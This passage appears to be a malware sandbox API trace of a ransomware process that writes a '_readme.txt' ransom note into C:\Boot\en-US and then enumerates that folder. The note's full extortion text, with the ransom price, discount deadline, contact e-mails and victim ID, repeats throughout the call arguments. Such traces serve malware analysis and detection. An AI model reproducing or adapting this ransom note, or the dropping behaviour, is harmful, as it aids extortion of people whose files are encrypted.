(pszPath="C:\\Boot\\") returned="Boot\\" [0090.766] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.766] PathFindFileNameW (pszPath="") returned="" [0090.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.766] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.767] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0090.767] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99c9c68 [0090.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.767] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.767] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0090.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.767] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.767] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0090.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.768] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.768] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.768] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.769] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.769] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.770] CloseHandle (hObject=0x5cc) returned 1 [0090.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.771] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa32b4160, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32b4160, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.771] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa32b4160, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32b4160, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.771] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.771] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0090.771] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa32b4160, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa32b4160, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32b4160, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.771] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa32b4160, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa32b4160, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32b4160, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.771] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.771] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.774] 